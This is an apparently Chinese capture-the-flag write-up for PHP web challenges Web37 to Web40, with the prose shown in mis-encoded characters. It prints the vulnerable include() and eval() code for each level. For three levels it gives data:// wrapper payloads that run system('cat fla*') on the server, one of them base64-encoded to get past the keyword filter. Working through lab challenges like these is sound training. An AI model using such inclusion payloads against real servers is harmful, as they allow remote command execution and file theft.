I"†<h3 id="web37">Web37</h3>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">error_reporting</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">])){</span>
  <span class="nv">$c</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">];</span>
  <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/flag/i"</span><span class="p">,</span> <span class="nv">$c</span><span class="p">)){</span>
    <span class="k">include</span><span class="p">(</span><span class="nv">$c</span><span class="p">);</span>
    <span class="k">echo</span> <span class="nv">$flag</span><span class="p">;</span>

  <span class="p">}</span>
    
<span class="p">}</span><span class="k">else</span><span class="p">{</span>
  <span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>ä¸å‰é¢çš„ç›¸æ¯”ï¼Œè¿™æ¬¡ç›´æ¥æ¢æ‰äº†<code class="language-plaintext highlighter-rouge">eval()</code>å‡½æ•°ï¼Œå˜æˆäº†<code class="language-plaintext highlighter-rouge">include</code></p>

<p>ç”¨ä¼ªåè®®å†™å…¥æ•°æ®æµï¼Œè¯»å–flag</p>

<p><a href="https://segmentfault.com/a/1190000018991087">å‚è€ƒæ–‡ç« </a></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>payload:?c=data://text/plain,&lt;?php system("cat fla*")?&gt;
</code></pre></div></div>

<h3 id="web38">Web38</h3>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">error_reporting</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">])){</span>
  <span class="nv">$c</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">];</span>
  <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/flag|php|file/i"</span><span class="p">,</span> <span class="nv">$c</span><span class="p">)){</span>
    <span class="k">include</span><span class="p">(</span><span class="nv">$c</span><span class="p">);</span>
    <span class="k">echo</span> <span class="nv">$flag</span><span class="p">;</span>

  <span class="p">}</span>
    
<span class="p">}</span><span class="k">else</span><span class="p">{</span>
  <span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>banæ‰äº†<code class="language-plaintext highlighter-rouge">file</code>å’Œ<code class="language-plaintext highlighter-rouge">php</code>ï¼Œç›´æ¥ç”¨base64ç»•è¿‡å»å°±è¡Œ</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>payload:?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhKiIpPz4=
</code></pre></div></div>

<p>è¿™é‡Œåº”è¯¥ä½¿ç”¨phpçš„<code class="language-plaintext highlighter-rouge">base64_encode($str)</code>å‡½æ•°åŠ å¯†ä¸€ä¸‹å­—ç¬¦ä¸²ï¼Œå¦åˆ™ä¸åŒ¹é…</p>

<h3 id="web39">Web39</h3>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">error_reporting</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">])){</span>
  <span class="nv">$c</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">];</span>
  <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/flag/i"</span><span class="p">,</span> <span class="nv">$c</span><span class="p">)){</span>
    <span class="k">include</span><span class="p">(</span><span class="nv">$c</span><span class="mf">.</span><span class="s2">".php"</span><span class="p">);</span>
  <span class="p">}</span>
    
<span class="p">}</span><span class="k">else</span><span class="p">{</span>
  <span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>å¢åŠ äº†åç¼€çš„é™åˆ¶ï¼Œå›åœ¨æœ€åä¼ å…¥çš„æ—¶å€™æ·»åŠ <code class="language-plaintext highlighter-rouge">.php</code>åç¼€ï¼Œé™åˆ¶äº†ä¼ å…¥ï¼Œä½†æ˜¯å¹¶ä¸ä¸¥è°¨ï¼Œå› ä¸ºå‰é¢çš„è¯­å¥å·²ç»æ‰§è¡Œå®Œæ¯•ã€‚</p>

<p><code class="language-plaintext highlighter-rouge">payload:?c=data://text/plain,&lt;?php system("cat fla*")?&gt;</code></p>

<h3 id="web40">Web40</h3>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">])){</span>
  <span class="nv">$c</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">];</span>
  <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/[0-9]|\~|\`|\@|\#|</span><span class="se">\\</span><span class="s2">$|\%|\^|\&amp;|\*|\ï¼ˆ|\ï¼‰|\-|\=|\+|\{|\[|\]|\}|\:|\'|</span><span class="se">\"</span><span class="s2">|\,|\&lt;|\.|\&gt;|\/|\?|</span><span class="se">\\\\</span><span class="s2">/i"</span><span class="p">,</span> <span class="nv">$c</span><span class="p">)){</span>
    <span class="k">eval</span><span class="p">(</span><span class="nv">$c</span><span class="p">);</span>
  <span class="p">}</span>
    
<span class="p">}</span><span class="k">else</span><span class="p">{</span>
  <span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>å•Šä¸è¡Œäº†ï¼Œæ˜å¤©çœ‹å¸ˆå‚…ä»¬çš„wpå§ï¼Œé¸½äº†</p>

:ET